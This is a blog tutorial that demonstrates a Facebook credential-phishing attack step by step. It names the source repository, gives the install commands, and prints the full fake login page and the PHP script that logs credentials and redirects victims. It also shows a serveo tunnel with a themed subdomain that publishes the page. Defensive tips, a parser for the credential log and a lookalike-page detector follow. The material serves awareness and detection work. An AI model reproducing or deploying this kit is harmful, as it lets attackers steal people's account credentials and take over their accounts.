Phish be with you not

Clarence Subia
4 min read · Dec 7, 2018

Phishing attacks on social media have become a pervasive and evolving threat in the digital age. These malicious tactics are designed to deceive individuals into divulging sensitive information, such as login credentials, financial details, or personal information, by impersonating legitimate entities or contacts.

Image taken from ShutterStock

In this example, let me demonstrate how easy it is to set up a Facebook phishing link that attackers may use to trick you into handing over your credentials. Take note that this is merely a demonstration and not to be used illegally.

  1. Cloning the look of the legitimate Facebook login page that will be used to trick the victim. For this demonstration, I have already done a quick search on the internet and compiled the necessary files here.
    GitHub: https://github.com/meliodaaf/facebook-login-page
  2. After cloning this repository to your workstation, move the files into the /var/www/html/ directory (Apache's default document root). In the listing below the kit's directory appears as facebook_signin, which is also the path used in the victim's link later on.
$ git clone https://github.com/meliodaaf/facebook-login-page.git

Cloning into 'facebook-login-page'...
remote: Enumerating objects: 12, done.
remote: Counting objects: 100% (12/12), done.
remote: Compressing objects: 100% (9/9), done.
remote: Total 12 (delta 2), reused 8 (delta 1), pack-reused 0
Receiving objects: 100% (12/12), 52.55 KiB | 854.00 KiB/s, done.
Resolving deltas: 100% (2/2), done.

$ sudo mv facebook-login-page/ /var/www/html/
$ cd /var/www/html
$ tree
.
└── facebook_signin
    ├── ArtOfLove.html
    ├── facebook.png
    ├── fb.ico
    ├── logs.txt
    ├── post.php
    ├── README.md
    └── style.css

1 directory, 7 files

3. Let’s take a look at the two files that matter most in this demonstration: ArtOfLove.html and post.php.

The HTML file is the fake Facebook sign-in page. It is named ArtOfLove.html so that the link sent to the victim looks like a legitimate page about love rather than a login page.

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="style.css">
    <link rel="icon" href="fb.ico" type="image/x-icon">
    <title>Facebook - Log In or Sign Up</title>
</head>
<body>
    <div class="intro">
        <img src="facebook.png" alt="">
        <h2>Connect with friends and the world around you on Facebook.</h2>
    </div>
    <div class="form">
        <!-- Both fields are POSTed to post.php on the same host, not to Facebook. -->
        <form action="post.php" method="POST">
            <input type="text" id="email_or_phone" name="email_or_phone" placeholder="Email or Phone Number" required><br>
            <input type="password" id="password" name="password" placeholder="Password" required><br>
            <button type="submit">Log In</button><br>
            <a href="#">Forgot Password</a>
            <hr>
            <!-- No type attribute, so this button also submits the form. -->
            <button class="secondary_btn">Create New Account</button>
        </form>
        <p><a href="#" class="secondary_link">Create a Page</a> for a celebrity, brand, or business.</p>
    </div>
</body>
</html>

The PHP file saves the victim’s input to a text file named logs.txt for later use; it writes every POSTed field, not just the two from the form. Take note of the Location header, which is where the victim is redirected after “logging in” to our fake Facebook, so the captured login looks like a successful one. Since logs.txt sits in the web root next to post.php, anyone who guesses its URL can read the captured credentials as well.

<?php
// Append every POSTed field, unescaped, to logs.txt next to this script.
$file = fopen("logs.txt", "a");

if ($file) {
    foreach ($_POST as $variable => $value) {
        fwrite($file, $variable . "=" . $value . "\r\n");
    }
    fclose($file);
} else {
    // Any output here is sent before the Location header, so the redirect below would fail.
    echo "Error: Unable to open the file for writing.";
}

// Send the victim on to a real page about love so the login appears to have worked.
header("Location: https://tinybuddha.com/blog/10-ways-let-go-open-love/");
exit;
?>
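Because post.php writes one name=value line per field with no separator between submissions, whoever recovers logs.txt (for example an incident responder who seizes the kit and has to notify victims) first has to regroup the lines into submissions. The following Python is an added example, not code from the original post or the kit: SAMPLE_LOG is a constructed drop file in the format post.php produces, and the grouping rule assumes the kit's form order, in which email_or_phone is the first input and so starts every browser submission.

```python
"""Recover victim submissions from the kit's logs.txt.

post.php appends one ``name=value`` line per POSTed field, terminated by
CRLF, with no separator between submissions. A responder who seizes the
kit therefore has to regroup the flat lines into submissions before
anyone can be notified or have their password reset. Added example, not
part of the original post: SAMPLE_LOG is a constructed drop file, and
FIRST_FIELD mirrors the kit's form, whose first input is email_or_phone
(browsers send fields in DOM order, so every real submission begins with it).
"""
from __future__ import annotations

FIRST_FIELD = "email_or_phone"
SECRET_FIELDS = ("password",)

# Constructed sample: two browser submissions, one hand-crafted POST that
# omitted the first field, a third submission, and one line without '='.
SAMPLE_LOG = (
    b"email_or_phone=alice@example.com\r\n"
    b"password=S3cret=pass!\r\n"
    b"email_or_phone=+15551234567\r\n"
    b"password=hunter2\r\n"
    b"password=orphan\r\n"
    b"email_or_phone=bob@example.org\r\n"
    b"password=pw\r\n"
    b"garbage line\r\n"
)


def parse_drop_file(data: bytes, first_field: str = FIRST_FIELD) -> tuple[list[dict[str, str]], list[str]]:
    """Regroup name=value lines into per-submission dicts.

    A new submission starts when the first form field appears again, or
    when a field name repeats inside the current record (a POST that left
    out the first field). Lines without '=' are returned separately so
    that nothing is dropped silently. Caveat: post.php writes values
    unescaped, so a value that itself contains CRLF (possible with curl,
    not with a browser text input) would be split across two lines.
    """
    submissions: list[dict[str, str]] = []
    malformed: list[str] = []
    current: dict[str, str] = {}
    text = data.decode("utf-8", errors="replace").replace("\r\n", "\n")
    for line in text.split("\n"):
        if line == "":
            continue
        name, sep, value = line.partition("=")  # value may contain '=' itself
        if not sep:
            malformed.append(line)
            continue
        if current and (name == first_field or name in current):
            submissions.append(current)
            current = {}
        current[name] = value
    if current:
        submissions.append(current)
    return submissions, malformed


def redact(submission: dict[str, str]) -> dict[str, str]:
    """Copy of a submission with secret fields replaced by their length, for a report."""
    return {k: (f"<{len(v)} chars>" if k in SECRET_FIELDS else v) for k, v in submission.items()}


def victims(submissions: list[dict[str, str]], first_field: str = FIRST_FIELD) -> list[str]:
    """Sorted, de-duplicated list of the identifiers that were entered."""
    return sorted({s[first_field] for s in submissions if first_field in s})


if __name__ == "__main__":
    subs, bad = parse_drop_file(SAMPLE_LOG)
    for s in subs:
        print(redact(s))
    print("victims to notify:", victims(subs))
    print("unparsed lines:", bad)
```

The grouping rule is only as reliable as the assumption that each browser submission starts with the first form field; a record that lacks it (the orphan password above) is kept as its own submission so it shows up in the report instead of being merged into a neighbour.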

4. Let’s start apache2 on our attacker machine and expose the site to the internet through serveo, which forwards a public hostname to our local port 80 over an SSH reverse tunnel.

With serveo, we request the subdomain lovers so that the public URL matches the theme of the lure.

$ sudo service apache2 start
$ ssh -R lovers:80:localhost:80 serveo.net
Forwarding HTTP traffic from https://lovers.serveo.net

5. Testing our site https://lovers.serveo.net from the internet. Here you can see the directory listing of the web root, including the folder containing our fake Facebook page. Of course, this is not the link that will be provided to the victim.

6. Accessing the link intended for the victim, https://lovers.serveo.net/facebook_signin/ArtOfLove.html.

7. Let’s try to log in and see whether the username and password end up in our logs.txt file.

As you can see, the email address and the password were logged, and we were redirected to https://tinybuddha.com/blog/10-ways-let-go-open-love/ after logging in.

8. So how do we prevent phishing? Here are some tips on how we can avoid phishing attacks, each of which would have blunted the demonstration above.

  • Education and Awareness: a login prompt that appears after clicking a link about a blog post, followed by a redirect to an unrelated site, is exactly the pattern shown here.
  • Use Strong, Unique Passwords: a password captured in logs.txt should not unlock any other account.
  • Enable Multi-Factor Authentication (MFA): this kit only captures the password, so a second factor still blocks the login.
  • Verify Email Senders
  • Avoid Clicking on Suspicious Links
  • Check Website Authenticity: the address bar shows lovers.serveo.net, not facebook.com, and the TLS padlock only proves the connection is encrypted, not that the site is Facebook.
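"Check Website Authenticity" can be turned into a concrete check. The Python below is an added example, not code from the original post or the kit: it parses a login page with the standard library, reads the brand claimed in the title and where the password form posts, and compares both against the host that serves the page. KIT_HTML is a trimmed copy of the ArtOfLove.html form above, PHISH_URL is the victim link from step 6, and BRAND_DOMAINS and TUNNEL_HOSTS are short illustrative tables that a real deployment would replace with its own brand-protection list.

```python
"""Heuristic checks for a lookalike login page.

The kit above is a textbook case: the <title> says "Facebook", the page is
served from a free tunnel host (lovers.serveo.net) and the password form
posts to a script on that host rather than to anything owned by Facebook.
Added example, not part of the original post. BRAND_DOMAINS and
TUNNEL_HOSTS are short illustrative tables (assumptions), and KIT_HTML is a
trimmed copy of the kit's form used as constructed sample input.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Brand name (as it appears in a page title) -> domains allowed to host its login.
BRAND_DOMAINS = {
    "facebook": ("facebook.com", "fb.com", "messenger.com"),
}
# Free reverse-tunnel / throwaway hosting services often seen in phishing kits.
TUNNEL_HOSTS = ("serveo.net", "ngrok.io", "localhost.run", "trycloudflare.com")

PHISH_URL = "https://lovers.serveo.net/facebook_signin/ArtOfLove.html"
KIT_HTML = """<!DOCTYPE html>
<html lang="en">
<head><title>Facebook - Log In or Sign Up</title></head>
<body>
<form action="post.php" method="POST">
<input type="text" id="email_or_phone" name="email_or_phone" placeholder="Email or Phone Number" required><br>
<input type="password" id="password" name="password" placeholder="Password" required><br>
<button type="submit">Log In</button>
</form>
</body>
</html>
"""


class LoginPageScanner(HTMLParser):
    """Collect the <title>, every <form action>, and whether each form has a password field."""

    def __init__(self) -> None:
        super().__init__()
        self.title = ""
        self._in_title = False
        self.forms = []  # each entry: {"action": str, "password": bool}

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # valueless attributes such as "required" map to None
        if tag == "title":
            self._in_title = True
        elif tag == "form":
            self.forms.append({"action": a.get("action") or "", "password": False})
        elif tag == "input" and (a.get("type") or "").lower() == "password" and self.forms:
            self.forms[-1]["password"] = True

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data


def host_matches(host: str, domain: str) -> bool:
    """True for the domain itself or any subdomain; rejects lookalikes like facebook.com.evil.net."""
    return host == domain or host.endswith("." + domain)


def scan_login_page(page_url: str, html: str) -> list:
    """Return human-readable findings; an empty list means nothing suspicious was seen."""
    scanner = LoginPageScanner()
    scanner.feed(html)
    page_host = urlsplit(page_url).hostname or ""
    findings = []

    # 1. Brand claimed in the title vs. the host actually serving the page.
    claimed = [b for b in BRAND_DOMAINS if b in scanner.title.lower()]
    for brand in claimed:
        if not any(host_matches(page_host, d) for d in BRAND_DOMAINS[brand]):
            findings.append(f"title claims '{brand}' but page is served from {page_host}")

    # 2. Free tunnel hosts are cheap, throwaway infrastructure, as in the serveo step above.
    if any(host_matches(page_host, t) for t in TUNNEL_HOSTS):
        findings.append(f"page is served from a free tunnel host ({page_host})")

    # 3. Where does the password actually go? Resolve relative actions against the page URL.
    for form in scanner.forms:
        if not form["password"]:
            continue
        action_url = urljoin(page_url, form["action"])
        action_host = urlsplit(action_url).hostname or ""
        for brand in claimed:
            if not any(host_matches(action_host, d) for d in BRAND_DOMAINS[brand]):
                findings.append(f"password form posts to {action_url}, which is not a {brand} domain")
    return findings


if __name__ == "__main__":
    for finding in scan_login_page(PHISH_URL, KIT_HTML):
        print("!", finding)
```

The same HTML served from www.facebook.com produces no findings, which is the point: nothing in the page body distinguishes the clone from the original, only where it is hosted and where the form posts. Suffix matching in host_matches is deliberate so that facebook.com.evil.net or lovers.serveo.net never pass as a brand domain.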
